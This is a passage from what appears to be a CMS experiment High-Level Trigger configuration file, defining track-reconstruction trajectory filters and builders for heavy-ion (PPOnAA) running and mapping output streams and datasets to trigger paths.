pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepInOutTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilterForFullTrackingPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetJetCoreStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairStepTrajectoryFilterInOutForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterBasePreSplittingForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 3.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 3.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 2.8 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 3.5 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterPreSplittingForDmesonPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingForDmesonPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
streams = cms.PSet(
ALCALumiPixelCountsExpress = cms.vstring( 'AlCaLumiPixelCountsExpress' ),
ALCALumiPixelCountsPrompt = cms.vstring( 'AlCaLumiPixelCountsPrompt' ),
ALCAP0 = cms.vstring( 'AlCaP0' ),
ALCAPHISYM = cms.vstring( 'AlCaPhiSym' ),
Calibration = cms.vstring( 'TestEnablesEcalHcal' ),
DQM = cms.vstring( 'OnlineMonitor' ),
DQMCalibration = cms.vstring( 'TestEnablesEcalHcalDQM' ),
DQMEventDisplay = cms.vstring( 'EventDisplay' ),
DQMOnlineBeamspot = cms.vstring( 'DQMOnlineBeamspot' ),
EcalCalibration = cms.vstring( 'EcalLaser' ),
Express = cms.vstring( 'ExpressPhysics' ),
ExpressAlignment = cms.vstring( 'ExpressAlignment' ),
HLTMonitor = cms.vstring( 'HLTMonitor' ),
NanoDST = cms.vstring( 'L1Accept' ),
ParkingBPH1 = cms.vstring( 'ParkingBPH1',
'ParkingBPHPromptCSCS' ),
ParkingBPH2 = cms.vstring( 'ParkingBPH2' ),
ParkingBPH3 = cms.vstring( 'ParkingBPH3' ),
ParkingBPH4 = cms.vstring( 'ParkingBPH4' ),
ParkingBPH5 = cms.vstring( 'ParkingBPH5' ),
PhysicsCommissioning = cms.vstring( 'Commissioning',
'Cosmics',
'HLTPhysics',
'HcalNZS',
'HighPtLowerPhotons',
'HighPtPhoton30AndZ',
'IsolatedBunch',
'MonteCarlo',
'NoBPTX',
'ZeroBias' ),
PhysicsEGamma = cms.vstring( 'EGamma' ),
PhysicsEndOfFill = cms.vstring( 'EmptyBX',
'FSQJet1',
'FSQJet2',
'HINCaloJets',
'HINPFJets' ),
PhysicsHLTPhysics1 = cms.vstring( 'EphemeralHLTPhysics1',
'EphemeralHLTPhysics2' ),
PhysicsHLTPhysics2 = cms.vstring( 'EphemeralHLTPhysics3',
'EphemeralHLTPhysics4' ),
PhysicsHLTPhysics3 = cms.vstring( 'EphemeralHLTPhysics5',
'EphemeralHLTPhysics6' ),
PhysicsHLTPhysics4 = cms.vstring( 'EphemeralHLTPhysics7',
'EphemeralHLTPhysics8' ),
PhysicsHadronsTaus = cms.vstring( 'BTagMu',
'DisplacedJet',
'JetHT',
'MET',
'Tau' ),
PhysicsMuons = cms.vstring( 'Charmonium',
'DoubleMuon',
'DoubleMuonLowMass',
'MuOnia',
'MuonEG',
'SingleMuon' ),
PhysicsScoutingMonitor = cms.vstring( 'ScoutingMonitor' ),
PhysicsZeroBias1 = cms.vstring( 'EphemeralZeroBias1',
'EphemeralZeroBias2' ),
PhysicsZeroBias2 = cms.vstring( 'EphemeralZeroBias3',
'EphemeralZeroBias4' ),
PhysicsZeroBias3 = cms.vstring( 'EphemeralZeroBias5',
'EphemeralZeroBias6' ),
PhysicsZeroBias4 = cms.vstring( 'EphemeralZeroBias7',
'EphemeralZeroBias8' ),
RPCMON = cms.vstring( 'RPCMonitor' ),
ScoutingPF = cms.vstring( 'ScoutingPFRun3' )
)
datasets = cms.PSet(
AlCaLumiPixelCountsExpress = cms.vstring( 'AlCa_LumiPixelsCounts_Random_v1' ),
AlCaLumiPixelCountsPrompt = cms.vstring( 'AlCa_LumiPixelsCounts_ZeroBias_v1' ),
AlCaP0 = cms.vstring( 'AlCa_EcalEtaEBonly_v13',
'AlCa_EcalEtaEEonly_v13',
'AlCa_EcalPi0EBonly_v13',
'AlCa_EcalPi0EEonly_v13' ),
AlCaPhiSym = cms.vstring( 'AlCa_EcalPhiSym_v9' ),
BTagMu = cms.vstring( 'HLT_BTagMu_AK4DiJet110_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet110_Mu5_v13',
'HLT_BTagMu_AK4DiJet170_Mu5_noalgo_v12',
'HLT_BTagMu_AK4DiJet170_Mu5_v12',
'HLT_BTagMu_AK4DiJet20_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet20_Mu5_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet40_Mu5_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_noalgo_v13',
'HLT_BTagMu_AK4DiJet70_Mu5_v13',
'HLT_BTagMu_AK4Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK4Jet300_Mu5_v12',
'HLT_BTagMu_AK8DiJet170_Mu5_noalgo_v9',
'HLT_BTagMu_AK8DiJet170_Mu5_v9',
'HLT_BTagMu_AK8Jet170_DoubleMu5_noalgo_v2',
'HLT_BTagMu_AK8Jet170_DoubleMu5_v2',
'HLT_BTagMu_AK8Jet300_Mu5_noalgo_v12',
'HLT_BTagMu_AK8Jet300_Mu5_v12' ),
Charmonium = cms.vstring( 'HLT_Dimuon0_Jpsi3p5_Muon2_v5',
'HLT_Dimuon0_Jpsi_L1_4R_0er1p5R_v7',
'HLT_Dimuon0_Jpsi_L1_NoOS_v7',
